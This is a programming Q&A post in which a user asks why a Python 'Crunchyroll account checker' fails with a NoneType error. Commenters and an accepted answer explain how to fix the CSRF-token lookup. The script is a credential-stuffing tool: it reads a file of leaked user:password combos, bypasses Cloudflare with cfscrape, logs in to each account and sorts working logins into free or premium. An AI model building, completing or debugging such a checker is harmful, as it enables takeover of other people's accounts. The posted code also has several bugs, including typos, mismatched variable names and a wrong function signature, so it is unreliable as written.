# How to solve: 'NoneType' object is not subscriptable

Tags: python, web-scraping

**I am creating a script that verifies crunchyroll accounts.
The error originates when "I try" to extract the CSRF token with BeautifulSoup.**

**code:**

```
def check ():
    session = cfscrape.create_scraper()
    login_page = sesseion.get(login)

    login_soup = BeautifulSoup(login_page.text,'html5lib' )
    csrftok = login_soup.find('input', {'name':'login_form[_token]'})['value']

    session.post(login,
                  data={'login_form[name]': user,
                        'login_form[password]': passw,
                        'login_form[redirect_url]': '/',
                        'login_form[_token]': csrftok})

    membership = session.get(acc_member)
    member_soup = BeautifulSoup(membership.text, 'html5lib')

    if member_soup.title.get_text().strip() == 'Crunchyroll -   Account Management':
        if member_soup.find(class_='acct-membership-status').contents[1].find('td').get_text().strip() == 'Free':
            print('free:{}'.format(user+ ':' + passw))

        else:
            print('Premium:{}'.format(user + ':' + passw))
    else:
        print('not working:{}'.format(user + ':' + passw))

    read_combos = open(file_combos, "r")
    for linea in read_combos.readlines():
        users, passwords = line.split(':')
        check(users.strip(), passwords.strip())
        read_combos.close()
```

**How do I solve the following error?**

```
File "checker2.py", line 15, in check
   csrftok = login_soup.find('input', {'name':'login_form[_token]'})['value']
TypeError: 'NoneType' object is not subscriptable
```

Comment: This statement `login_soup.find('input', {'name':'login_form[_token]'})` is returning None so when you try to get the element `['value']` it throws an error. Try adding a check to see if the find statement had any results before continuing.

Comment: Consider wrapping line 15 in a `try: ... Except TypeError as e: ...`

Answer (score 0, accepted):

Something like this is better than try/except:

```
e = login_soup.find('input', {'name':'login_form[_token]'})
csrftok = e['value'] if e else 'Not Found'
```